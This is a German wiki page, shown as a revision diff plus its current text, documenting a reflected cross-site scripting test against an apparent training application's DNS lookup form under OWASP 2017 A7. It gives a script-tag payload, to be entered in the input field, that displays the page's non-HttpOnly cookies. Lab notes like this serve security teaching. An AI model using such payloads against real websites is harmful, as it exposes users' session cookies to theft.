X-Crossite-Scripting: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „=Schwachstelle= *OWASP2017 **A7-Cross-Site-Scripting(XSS) ***Reflected First Order *****DNS LOOKUP“) |
|||
| (4 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
| Zeile 4: | Zeile 4: | ||
***Reflected First Order | ***Reflected First Order | ||
*****DNS LOOKUP | *****DNS LOOKUP | ||
| + | =Testen ob Anwendung verwundbar ist= | ||
| + | [[Datei:Owasp-xss-1.png]] | ||
| + | |||
| + | =Es geht ein Fenster auf - Seite ist verwundbar= | ||
| + | [[Datei:Owasp-xss-2.png]] | ||
| + | =Cookie auslesen= | ||
| + | ;Das muss ins Eingabefeld | ||
| + | *<script>alert('Cookies which do not have the HTTPOnly attribute set: ' + document.cookie);</script> | ||
| + | [[Datei:Owasp-xss-3.png]] | ||
Aktuelle Version vom 29. Juli 2021, 18:46 Uhr
Schwachstelle
- OWASP2017
- A7-Cross-Site-Scripting(XSS)
- Reflected First Order
- DNS LOOKUP
- Reflected First Order
- A7-Cross-Site-Scripting(XSS)
Testen ob Anwendung verwundbar ist
Es geht ein Fenster auf - Seite ist verwundbar
Cookie auslesen
- Das muss ins Eingabefeld
- <script>alert('Cookies which do not have the HTTPOnly attribute set: ' + document.cookie);</script>
